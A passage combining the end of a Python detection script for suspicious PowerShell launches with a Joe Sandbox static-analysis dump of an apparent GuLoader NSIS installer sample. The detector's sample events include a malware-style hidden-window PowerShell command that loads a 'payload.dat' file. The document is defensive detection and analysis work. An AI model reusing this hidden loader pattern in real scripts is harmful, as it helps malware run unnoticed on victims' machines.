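        command_line=r'''"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\payload.dat'"''',
    ),
    ProcEvent(  # interactive admin session: no indicator fires
        parent_image=r"C:\Windows\System32\cmd.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    ),
    ProcEvent(  # scheduled maintenance script: hidden window only, below threshold
        parent_image=r"C:\Windows\System32\svchost.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r"powershell.exe -WindowStyle Hidden -File C:\ProgramData\Scripts\cleanup.ps1",
    ),
]

if __name__ == "__main__":
    for ev, hits in detect(SAMPLE_EVENTS):
        print(f"ALERT {ev.parent_image} -> {ev.image}: {', '.join(hits)}")
```

Requiring two indicators keeps hidden-window PowerShell started by scheduled tasks from alerting on its own, while the combination in this sample still fires with all three. In production the command-line checks should also cover -EncodedCommand and decoded script content, since later GuLoader builds do not always pass the Get-Content call in clear text.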

APIs
• CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
Strings
• C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151, xrefs: 0040226E
Memory Dump Source
• Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151
• API String ID: 542301482-1983529546
• Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
• Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
• Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
• Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54
Uniqueness
Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00405086
                                                      • GetDlgItem.USER32(?,00000408), ref: 00405091
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
                                                      • SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00405147
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
                                                      • DeleteObject.GDI32(00000000), ref: 00405168
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A
                                                        • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004052AC
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
                                                      • ShowWindow.USER32(?,00000005), ref: 004052CA
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00405498
                                                      • GlobalFree.KERNEL32(00000000), ref: 004054A8
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405604
                                                      • ShowWindow.USER32(?,00000000), ref: 00405652
                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040565D
                                                      • ShowWindow.USER32(00000000), ref: 00405664
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 2564846305-813528018
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040485E
                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404872
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040488F
                                                      • GetSysColor.USER32(?), ref: 004048A0
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
                                                      • lstrlenW.KERNEL32(?), ref: 004048C1
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040493C
                                                      • SendMessageW.USER32(00000000), ref: 00404943
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040496E
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
                                                      • SetCursor.USER32(00000000), ref: 004049C2
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
                                                      • SetCursor.USER32(00000000), ref: 004049DE
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A0D
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                      • String ID: 7G@$: Completed$N$m
                                                      • API String ID: 3103080414-2469137636
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406463,?,?), ref: 00406303
                                                      • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C
                                                        • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                        • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                      • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
                                                      • wsprintfA.USER32 ref: 00406347
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
                                                      • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
                                                      • GlobalFree.KERNEL32(00000000), ref: 00406430
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437
                                                        • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                        • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                      Strings
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                      • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                      • API String ID: 2171350718-2529913679
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                      • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                      • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                      Strings
                                                      • "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe", xrefs: 00406974
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
                                                      • *?|<>/":, xrefs: 00406982
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 589700163-2900581319
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404685
                                                      • GetSysColor.USER32(00000000), ref: 004046C3
                                                      • SetTextColor.GDI32(?,00000000), ref: 004046CF
                                                      • SetBkMode.GDI32(?,?), ref: 004046DB
                                                      • GetSysColor.USER32(?), ref: 004046EE
                                                      • SetBkColor.GDI32(?,?), ref: 004046FE
                                                      • DeleteObject.GDI32(?), ref: 00404718
                                                      • CreateBrushIndirect.GDI32(?), ref: 00404722
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                      • Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
                                                      • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                      • Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                        • Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406269
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                      • String ID: 9
                                                      • API String ID: 163830602-2366072709
                                                      • Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                      • Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
                                                      • Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                      • Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DestroyWindow.USER32(?,00000000), ref: 0040304E
                                                      • GetTickCount.KERNEL32 ref: 0040306C
                                                      • wsprintfW.USER32 ref: 0040309A
                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                      • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                        • Part of subcall function 00403017: MulDiv.KERNEL32(?,00000064,?), ref: 0040302C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 722711167-2449383134
                                                      • Opcode ID: c844b91f24ced077c14a758bff1a62ed25a2b151bbc768ebfdb9d0a12ed3356e
                                                      • Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
                                                      • Opcode Fuzzy Hash: c844b91f24ced077c14a758bff1a62ed25a2b151bbc768ebfdb9d0a12ed3356e
                                                      • Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
                                                      • GetMessagePos.USER32 ref: 00404FDF
                                                      • ScreenToClient.USER32(?,?), ref: 00404FF9
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                      • Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
                                                      • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                      • Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                      • wsprintfW.USER32 ref: 00402FEA
                                                      • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                      • API String ID: 1451636040-1158693248
                                                      • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                      • Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
                                                      • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                      • Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                      • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
